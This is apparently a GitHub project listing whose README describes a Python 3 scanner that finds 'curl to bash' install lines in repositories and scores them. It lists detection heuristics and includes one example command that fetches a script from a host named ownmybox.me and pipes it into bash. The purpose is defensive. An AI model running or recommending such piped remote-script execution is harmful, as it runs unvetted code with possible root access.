https://github.com/infoforcefeed/curl2sudo
Python 3 and a lot of disdain.
https://github.com/infoforcefeed/curl2sudo
Last synced: 11 months ago
JSON representation
Python 3 and a lot of disdain.
- Host: GitHub
- URL: https://github.com/infoforcefeed/curl2sudo
- Owner: infoforcefeed
- Created: 2014-01-03T03:07:54.000Z (over 12 years ago)
- Default Branch: master
- Last Pushed: 2014-01-03T03:21:49.000Z (over 12 years ago)
- Last Synced: 2025-01-08T09:12:09.825Z (over 1 year ago)
- Language: Python
- Size: 121 KB
- Stars: 3
- Watchers: 5
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
This is a Python3 project that looks on github for offending curl2sudo lines
and dumps them to offenders.json.
The score is computed based on how 'bad' it is and is almost complete arbitrary.
Notes
=====
Properties that an offender probably has:
* curl or wget at the beginning of the line
* http or https somewhere in the line
* a bash or sh at the end
* a pipe symbol between the curl/wget and the bash/sh
Properties an offender may have:
* Fancy execution `bash < <(curl https://ownmybox.me/install.sh)`
* $1 or other weird ways to get an arbitrary URL
Properties and offender gets bonus points for:
* Having a sudo in the line (!!!)
* su somewhere in the line (less likely)